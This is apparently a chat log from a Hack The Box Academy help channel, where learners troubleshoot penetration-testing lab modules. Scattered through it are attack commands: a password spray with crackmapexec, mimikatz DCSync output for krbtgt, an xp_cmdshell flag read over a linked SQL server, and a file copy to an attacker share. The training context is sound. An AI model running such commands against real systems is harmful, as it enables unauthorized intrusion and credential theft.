see if it'll list shares

steel veldt
#

how to start with coding or hacking?

shut wraith
# fathom pendant see if it'll list shares

smbclient is a tool specifically for interacting with SMB/CIFS servers, not WebDAV servers. WebDAV and SMB/CIFS are different protocols used for network file sharing.

compact patrolBOT
shut wraith
#

I got ```: Not enough '' characters in service

#

@acoustic owl can u help me out

fathom pendant
acoustic owl
#

In which module, which section?

fathom pendant
#

\\\\ip\\

shut wraith
#

It's asking for the password for the workgroup of my vm. Its the HTB browser vm

fathom pendant
#

just hit enter

shut wraith
# acoustic owl In which module, which section?

Module: File Transfer

Trying SMB upload to share made by wsgidav
Command:
sudo wsgidav --host=0.0.0.0 --port=8887 --root=/tmp --auth=anonymous
I used:
my kali:
dir \\10.10.15.204:8887\
On windows box:
copy C:\Windows\System32\drivers\etc\hosts \\10.10.15.204:8887\
I think there is a problem with the share name. What is the share name for the share I created

fathom pendant
#

if anonymous mode is on: just hit enter

shut wraith
#

Not enough \ characters in service

fathom pendant
#

also it looks like wsgidav hosts a web service

shut wraith
#

405 method not allowed

#

Thanks I will read through it

ocean night
#

wsgidav is the fileserver being used to copy files via SMB to the host

fathom pendant
#

also try adding share1 at the end maybe?

shut wraith
#

Yeah it works

#

So since it is a web server then how do I upload files to it on the windows box. Different command?

fathom pendant
#

you'd likely need to use invoke-webrequest

#

i'm rusty on my iwr stuff for windows but I think there's a section in File Transfers that has something like that

#

with you starting a python uploadserver

shut wraith
#

I tried using Invoke-FileUpload but it said network path problem

fathom pendant
#

windows is weird with it's syntax at times

shut wraith
#

That's so true

frosty spade
#

hey guys using tmux i get alot of symbols ex  how would one prevent those or does one filter them out

limber river
#

if someone on skill assessment part 1 AD enumeration & attack can you confirm that MS01 is actually working , I got shell on it and can't run cmd ?

onyx dust
# limber river if someone on skill assessment part 1 AD enumeration & attack can you confirm th...

i wrote this for people stuck on that one. https://forum.hackthebox.com/t/active-directory-skills-assessment-i/257250/48 should help

#

πŸ˜‰

#

fun fact: u can use these tricks to do the "impossible ad" set of the oscp exam should u betaking the exam and misfortunate enough to roll that set.

storm stratus
#

Hey guys, I am in the YARA and Sigma for SOC Analysts module in the SOC Analyst path and I am stuck in the Skills Assessment question:

The "C:\Rules\yara\seatbelt.yar" YARA rule aims to detect instances of the "Seatbelt.exe" .NET assembly on disk. Analyze both "C:\Rules\yara\seatbelt.yar" and "C:\Samples\YARASigma\Seatbelt.exe" and specify the appropriate string inside the "$class2" variable so that the rule successfully identifies "C:\Samples\YARASigma\Seatbelt.exe". Answer format: L________r

I tried running .\Seatbelt.exe but no luck. Also tried analyzing it in the HxD dump but got nowhere. If anyone could give me a baseline on how to go about this would be greatly appreciated.

tranquil axle
storm stratus
thorn urchin
onyx dust
#

intentionally diasbled *

thorn urchin
#

I dont use chisel so

#

Β―_(ツ)_/Β―

onyx dust
#

Β―_(ツ)_/Β―

#

oscp is not hard to take πŸ™‚

thorn urchin
#

or rather chisel is my plan B or if I need to specifically redirect to a local firewalled port

#

it really wasnt. Im just convinced most failures are unprepared

onyx dust
#

i think people fail it because they expect to be carried by the training which is just so uninspired

#

but if you just do stuff on computers u will pass

thorn urchin
#

the training is god awful

onyx dust
#

skills-wise it's entry level

thorn urchin
#

If I hadnt wanted to complete it specifically for my blog post to compare it to CPTS it would have been an utter waste of time lol

analog dock
onyx dust
#

i know i used those tricks πŸ™‚

thorn urchin
#

would ligolo-ng have worked for the 'impossible ad' set? Because thats what I default used in my exam.

onyx dust
#

some people on reddit dont know though and they will complain about it not tunneling

analog dock
#

Didn’t need that

onyx dust
#

it depends on if u get that set or not

analog dock
#

I got the one they talked about on Reddit

onyx dust
#

the exam rotates boxes because cheaters

#

well i'm glad that you passed

analog dock
#

So am I

#

Those people on Reddit made me extremely nervous lol

shut wraith
#

Can I be admin on htb pwnbox

acoustic owl
shut wraith
shut wraith
# acoustic owl

That is good to know. Is there a way to get admin on the windows box for the file transfer module? Because I can't transfer any files to the windows machine otherwise

acoustic owl
shut wraith
limber river
acoustic owl
shut wraith
errant elbow
#

or host a smb server (smbserver.py (dont forget -smb2support)) on attack box so you can copy it directly from windows box

#

cf File Transfers module on academy

fathom pendant
#

That's the module they're doing I think

dire abyss
#

im having a bit of a hard time with ssh (so simple but idk what im doing wrong). module is passwords attacks, pass the ticket from linux.

the question gives the credentials and port to ssh to. (ssh david@<target-ip> -p 2222) however when prompted for the password, "Password2", it comes back as incorrect.

thorn urchin
#

which is why temp folder locations are so useful

#

preknown world writeable πŸ‘

shut wraith
fathom pendant
#

2 things: is the web server running on port 80

#

and 2 i don't think the python server runs on https

dire abyss
fathom pendant
#

reading the card explains the card

patent oak
#

Good evening! I am doing the Pass the ticket part of passwords module. In Rubeus when I go to run the command that should give me access to the share I get a 1450 error, not enough system resources to complete the requested service

#

Could this just mean I did it wrong or?

#

If anyone knows it'd be much appreciated!

Edit: nevermind! Found it 🀠

shut wraith
sterile epoch
#

it seems to be stuck I am in skill assessment 2 for ad enumeration. I tried reseting the target there is no change...

#

am i doing it wrong?

analog dock
#

What makes you think that’s the way to go

sterile epoch
#

the task had weak password written in it so I thought might as well give it a try

analog dock
#

I personally used cme

#

Netexec should work

sterile epoch
#

netexec looks new I will look into that

analog dock
#

It’s same as crackmapexec but better

sterile epoch
#

what is the flag for domain in cme?

analog dock
#

U don’t need it

#

At least I didn’t

sterile epoch
#

oh ok

analog dock
#

I made a valid user list by using the user we got from the other questions

sterile epoch
#

I am looking into netexec documentation now

sterile epoch
analog dock
#

And then password spray on the user list on the .50 ip

analog dock
sterile epoch
#

oh kerbrute returned the result

analog dock
#

crackmapexec smb 172.16.7.50 -u <userlist> -p <passtotry>

sterile epoch
#

took a while

analog dock
#

It’s a very big user list

sterile epoch
#

well it worked with Welcome1 but what if I am in some other engagement how to determine the password to use

#

I used this cuz it was used before

fathom pendant
#

it just involves some recon

#

Welcome1 is a fairly common onboarding password

analog dock
#

Well you wouldn’t really know, except if you’d find like other default creds for them

fathom pendant
#

like far more common than it should be

analog dock
#

Like Inlanefreight2023

fathom pendant
#

but you'd have to dig into stuff

analog dock
fathom pendant
#

big brain

thorn urchin
astral inlet
#

sommer and winter are also common

buoyant void
#

So I'm trying to do one of the questions in the AD enumeration & attacks module, specifically the section on ExtraSids attack. Question asks me to perform a Golden Ticket attack but I can't seem to get the NT hash for the child domains KRBTGT acount. This is the command I'm running and the error I'm getting:

mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
[DC] 'LOGISTICS.INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC02.LOGISTICS.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'LOGISTICS\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

#

Never mind this can be ignored, I got it to work

sterile epoch
#

Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?
I am stuck on this task in ad enumeration and attacks module can someone point me in some direction. I tried to log into the sql01 server but it did not work and both the users I found do not have replication rights. I tried as-rep but nothing returned during recon

#

I tried looking for it in MS01 BRxxx user too did not find anything

next bronze
sterile epoch
#

what am I missing

thorn urchin
sterile epoch
thorn urchin
#

Yes thats the skill assessment page, Im talking about prior sections in the module.

#

Review your notes. if that doesnt reveal the clue reread the section information again

sterile epoch
fathom pendant
#

It's a skill assessment, use your brain

#

You got this far

sterile epoch
#

found it

#

cme

#

nope wrong call

modest grove
#

hi where do i start?

fathom pendant
compact patrolBOT
modest grove
#

ty

sterile epoch
#

I will go to sleep will pick it up in the morning its 6am now

#

good night guys

dire abyss
#

i made it to Q about julio and getting a file from \dc01\julio, I got past all that how I cant use cat or type against the flag.txt within smbclient

#

says the command isnt found... module Password attacks - pass the ticket linux... is there another command like those to read out the flag?

#

root@linux01:~# smbclient //dc01/julio -k -c cat julio.txt -no-pass
cat: command not found

fathom pendant
#

cat isn't an smb command

dire abyss
#

mmm okay okay, good hint, let me dig. thanks

fathom pendant
#

try just connecting, don't pass a command

#

also try putting -no-pass before the command flag

dire abyss
#

okay i was able to connect.. used help and i see available commands

fathom pendant
#

gl

dire abyss
#

thank you

fathom pendant
#

:)

#

sometimes taking a step back to basics helps :D

lofty wave
#

Update on this or for anyone else searching for help. A nudge is to REALLY pay attention to the question being asked. Something to be said for the KISS (Keep It Simple Stupid) method.. πŸ™ƒ

fathom pendant
#

yep

outer urchin
#

Hi all, I am on the medium lab for the footprinting module and was wondering how to delete the TechSupport share after unmounting. I keep getting permission denied even as root.

#

I cannot post screenshots for some reason

tight mesa
#

anyone in this room who interact at the same time with the HTB Forum, to ask something?

fathom pendant
#

you need to link your account

fathom pendant
outer urchin
fathom pendant
#

that's not OCD

tight mesa
#

hello there, anyone who can give me a hand with Module WinPrivEsc | Interacting with Users section, I'm trying to upload a CSF file, but can't find a writable drive into the shared folder, any hint..!!!

short hare
#

Stuck on WINDOWS PRIVILEGE ESCALATION: DnsAdmins
Question: Leverage membership in the DnsAdmins group to escalate privileges. Submit the contents of the flag located at c:\Users\Administrator\Desktop\DnsAdmins\flag.txt

Even after adding netadm to to Domain Admins group, why the reverse shell is not running I have done the following.
Any nudge will will helpful

Stuck for so long..!!

short hare
next bronze
#

again, why are you running sh on windows, and your user is already DA, why bother sending a rev shell

tight mesa
#

I'm stuck on WinPrivEsc | Interacting with users, I can't find a writable shared folder, any hint?

short hare
next bronze
#

relog

short hare
heavy marsh
#

Anyone having issues getting into the Active Directory labs?

compact halo
heavy marsh
#

I've tried changing VPNs and respawning three times for AD Skill Assessment 2.

compact halo
#

I changed vpns, cleared cache, logged out and back in and still having issues

heavy marsh
#

It's been hit or miss lately.

compact halo
#

Also, it appears the targets disconnect at times even when the timer states 80 minutes on it

#

been waiting for target to spawn for the past 5 minutes

twin kelp
#

I have an enterprise account and its been over 20 minutes and my machine is still ""Deploying" how can i get this fixed?

hollow thunder
#

is anyone having any connectivity problems right now?

compact halo
#

Seems like we all are. Can't get the target to spawn

hollow thunder
#

wowowow

#

im locked in rn. breaking my flow

ruby whale
compact halo
#

mine finally just came up. We'll see how long it lasts

fair cedar
#

Hello in Windows Attacks & Defense module in the section regarding β€œPKI-ESC1” I cant seem to connect to the PKI server. I cant even ping it. Can somebody help with this as far as how would I connect and check the event logs?

ruby whale
#

Targets are spawning

fair cedar
#

Hello in Windows Attacks & Defense module in the section regarding β€œPKI-ESC1” I cant seem to connect to the PKI server. I cant even ping it. Can somebody help with this as far as how would I connect and check the event logs?

heavy marsh
#

This is the given user:pass from the AD Skills Assessment 2

fathom pendant
#

no route to host

#

oof

ocean night
#

Any odd output from your openvpn connection, or are you using Pwnbox?

#

That error suggests you're not connected to the lab network

fathom pendant
#

just due to ssh being highlighted

hollow thunder
#

that is kali

lucid grotto
#

Hey Guys hope everyone great, need little bit of heads up here just paid for academy to start learning but my work suddenly became busy am only able to spend just an hour with the tutorial so frustrating, should I quit my job to stay focus and do anyone know any remote job or something I can do cause I got bills to pay !πŸ˜‚ just saying any advice would be appreciated.

fathom pendant
#

I wouldn't advocate to quit a job unless you can comfortably afford to do so

short hare
# next bronze relog

tried to relog in and still this issue..!!
Reset the traget multiple times but don't know..!!

fathom pendant
short hare
fathom pendant
#

"Quit" how? Lol

short hare
#

wokred

fathom pendant
#

Because that can mean a few different things

#

Lol nice

short hare
#

wokred..

fathom pendant
#

Go to sleep. Or at least step away from the computer. Looks like you need a break

short hare
#

ah..!!

i hate windows from now on

fathom pendant
#

Tbf wouldn't it be odd to turn your computer on (from a non-hibernated state) to a screen full of stuff you did last time?

short hare
short hare
#

Thanks @fathom pendant

fathom pendant
#

But the more you push yourself the more mistakes you are inevitably gonna make

fathom pendant
#

Taking breaks is healthy

#

The academy will still be there tomorrow

short hare
#

Looks like I really need this..!!

ooohhhkayy..!!!
Little break time..!

next bronze
short hare
fathom pendant
#

Imo if you're trying to rush bc you forgot about your silver annual, I'd make sure you cancel the sub so it doesn't try and auto renew

onyx dust
#

does htb have a cube sale like steam does

#

for the summer or w/e

fathom pendant
#

Not afaik

ocean night
#

We do have discounts now and again

ruby whale
ocean night
#

Best to keep an eye on our social channels πŸ™‚

ruby whale
#

Yes

fathom pendant
#

I just wouldn't say to quit until they find another job

lucid grotto
short hare
ocean night
#

I think the team hit up Instagram too

sterile epoch
#

I went through my notes I could not find anything related to a file having mssql string nor in the hacktricks I even got a shell for the sql01 server module need a hint please

sterile epoch
#

ad enumeration and attacks skill assessment 2

#

q6

ionic surge
#

can anyone give me a nudge on Network Enumeration with Nmap, Firewall and IDS/IPS Evasion - Medium Lab?

autumn pilot
#

The tool was mentioned in one of the sections of the module

ionic surge
#

hi, can anyone give me a nudge please?

sterile epoch
ionic surge
#

may i dm?

sterile epoch
ionic surge
#

can't figure out how to get the proper server version, i've been looking through the writeup at the beginning of the chapter, and been experimenting

should i be using --source-port 53 and target port 22?

ionic surge
#

i meant the

ionic surge
#

Network Enumeration with Nmap, Firewall and IDS/IPS Evasion - Medium Lab

sterile epoch
#

to enumerate server version look into commonly used switches

rustic sage
#

hello guys can some 1 help me login it says that this account does not mach our records

sterile epoch
#

login where?

sterile epoch
#

please

autumn pilot
#

It was mentioned once in the beginning of the module (briefly)

#

and to get more info about it you need to go deep down into the rabbit hole

dire abyss
#

running module password attacks, protected files

#

im getting permission denied on ssh2john.py is that normal

ocean night
dire abyss
ocean night
dire abyss
ocean night
#

whereis ssh2john.py, and then ls -lh <path from above command> - what do you see?

dire abyss
#

i have to be root?

ocean night
#

No it's got the executable bit, so should be fine

#

pwd ?

fathom pendant
#

Is the id_rsa file root?

ionic surge
dire abyss
ocean night
#

There's your problem

sterile epoch
ocean night
#

Do you have write access to that directory?

dire abyss
ionic surge
#

Submit the DNS server version of the target as the answer.

dire abyss
ocean night
#

πŸ™‚

dire abyss
#

thanks!

soft cedar
ocean night
ionic surge
#

sudo nmap <ip>, no icmp echo requests, no DNS resolution, on some confirmed open ports and a confirmed closed port, check for service version and output, osscan, source port 53

#

i managed to get the open state on port 53, but osscan returned that it couldn't identify the fingerprint

sterile epoch
#

I looked in the rabbit hole thought to use this but even this is not working
crackmapexec smb 172.16.7.60 -u BR086 -p Welcome1 -M spider_plus --share 'Department Shares'

next bronze
soft cedar
dire abyss
next bronze
#

use python 2

ocean night
#

oof

#

Python 2 still has a place in my heart mind

next bronze
#

PepeOldHH back in the day

ocean night
#

haha

dire abyss
#

lol damn today is not my day.. pwnbox doesn't find python2

autumn pilot
#

python2.7

dire abyss
#

i got 2.7.. let me try that

#

f*** finally, thank you guys for the help

sterile epoch
#

is there a way to use tree?

fathom pendant
#

@lyric sigil is there a reason you dmed me without asking?

ionic surge
fathom pendant
#

tcp/udp

lyric sigil
#

thanks for answer

fathom pendant
#

the only reason I ask is because 2 things:

  1. I don't know you
  2. read #rules; don't dm people without asking
#

I'm not staff/mod, so I don't have the unfortunate luxury of needing to respond to random PMs

lyric sigil
#

🫑

ocean night
#

need is a strong word

#

πŸ˜…

#

But yeah, generally I respond, unless it's just "hello"

fathom pendant
# ocean night _need_ is a strong word

that's fair; I just mean I generally have to deal with rando PMs for a server I actually do mod for, usually just to bait them into revealing they're an art scammer or a "promoter"

lyric sigil
#

dont will happes again, mb for it

sterile epoch
#

the skill assessment for ad enum is really covering for a lot of things. After I gained access to the db admin on the sql server I still cannot access admin desktop. I guess I gotta do xp_dirtree

winter blaze
#

I'm stuck on the Attacking Common Services Hard lab, last question.

I already impersonated the correct user, can interact with the linked sql server but when I try to retrieve the flag using EXECUTE('xp_cmdshell "type C:\Users\Administrator\Desktop\flag.txt >c:\users\fiona\desktop\x.txt"') AT [LOCAL.TEST.LINKED.SRV]
and i am getting this error Msg 15281, Level 16, State 1, Server WIN-HARD\SQLEXPRESS, Procedure xp_cmdshell, Line 1 SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online. 1> type c:\users\fiona\desktop\x.txt for that reason i can not see the flag can someone please help me ?

tranquil axle
#

well it says xp_cmdshell is deactivated, so you either have to see if you can activate it or if there is another thing you can try

winter blaze
#

how can i activate >?

next bronze
#

read the sql section in the module

winter blaze
#

i just need that hint xd

next bronze
#

the hint is already given

fathom pendant
winter blaze
#

okay my bad

rustic sage
#

Has anyone experienced this issue?

proxychains evil-winrm -u backupadm -i 10.129.239.174

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error

Error: Exiting with code 1

soft cedar
rustic sage
#

I tried reinstalling evil-winrm. Changing proxychains.conf to different ports.

#

I edited VPN file, still experiencing the issue.

soft cedar
rustic sage
#

@next bronze - Thank you, appreciated.

peak mauve
#

If i buy platinum, can i unlock mutiple modules or does a previous module need to be completed to be eligible for unlock?

tranquil axle
#

you can unlock as many as you want as long as you have the cubes

#

by finishing a previous module you get some of the cubes back, but you can do that at any time

peak mauve
#

So its cheapest to buy platinum and just unlock them

tranquil axle
#

unless you are a student, yes

peak mauve
#

Two months of platinum will unlock a whole path basically

next bronze
#

yep, and with extra cubes to spare

peak mauve
#

And do you get to keep the modules even after you end your subscription?

tranquil axle
#

any module you unlock you keep forever

peak mauve
#

Sweet

tranquil axle
#

you do lose access to unlimited pwnbox though, but its better to have your own vm anyway

peak mauve
#

Ill just buy platinum when i get paid on Friday

#

I havent tried pwnbox yet, ive just been using a vm

tranquil axle
#

its just a vm in browser, so nothing special in your case. If you don't have the ressources to run your own vm it can be helpful, but if you are serious about this you are likely to set up your own vm anyway

peak mauve
#

Is it decently fast?

#

My laptop is a POS

ocean night
#

It's fast enough for HTB content πŸ™‚

peak mauve
#

Lol fair

#

I might try it out

peak mauve
#

I'm learning allot

ocean night
#

That's awesome, thank you

next bronze
peak mauve
#

Oh, thats probably faster than what im using then

#

I am using 2 i5-7200U

#

With 4gb ram

muted obsidian
#

may i ask a entry level question here.....if i have no fundation and i want to change career into hacker, how much and how long i need if i study in hack the box?? thx a lot

livid ether
#

depends of how much effort u give into it

muted obsidian
#

i mean it need to cost me in hack the box....i just want to have a preparation that how much i need to prepare before change career and start make money by hacking

viral lance
#

hi folks, where do we submit/report issues within learning modules?

ocean night
viral lance
#

thanks @ocean night !

copper spindle
#

hey guys, how can i find free rooms or something that are free like Try Hack Me? I'm new in HTB

ocean night
dry halo
barren salmon
#

is there any known server issues? all my nmaps requests never finishes?

tranquil axle
#

are you connected to the vpn? also make sure your nmap scan isn't crazy slow or doing a lot of things at the same time

vague cedar
#

Module:INFORMATION GATHERING - WEB EDITION
section DNS:
The question is
Which subdomain is returned when querying the PTR record for 173.0.87.51?
i am using the below command
dig -x 173.0.87.51
and getting two subdomains and on submit get the output---> incorrect answer
please guide me if i am doing something wrong

barren salmon
#

yes im using parrot

autumn pilot
barren salmon
#

also for a sS scan

vague cedar
autumn pilot
#

As you can see now the IP address has changed

vague cedar
#

yes

#

so was something on the backend not in my approach

rustic sage
#

hello everyone. I am trying to connect to the htb cozyhosting.htb machine. but I am having a connection problem. I successfully connected to the vpn. I also connected when I pinged the server. but I cannot connect to cozyhosting.htb in firefox.
the problem is:

"Check that Firefox has permission to access the web(you might be connected but behind a firewall)"

how can I fix this problem

stark vortex
#

add cozyhosting.htb to your /etc/hosts file

#

also this question is better suited for the #boxes channel

rustic sage
stark vortex
#

just verify your account, read #welcome to see how to do that πŸ™‚

next totem
#

Hi

upbeat dragon
#

Hello guys, im struggling trying to load the SocksOverRDP.dll, every time i run the regsvr32.exe command it fails claiming that the DLL failed to load.. Any idea why? [SOLVED]

errant elbow
#

Hi guys, currently doing the Windows Privilege Escalation Skills Assessment - Part II module for CPTS, i noticed that AlwaysInstallElevated was enabled (cf screen), however when i run my revshell with msiexec i get a shell as my current user and not as SYSTEM, can any of you guys nudge me in the right direction ?

dull thistle
#

I found someone exposing answers to active modules; how/where do I report it? πŸ˜„
Or can I just DM a mod?

pure jetty
#

hola! is it just me or anyone facing this its taking forever for the pwnbox to load

errant elbow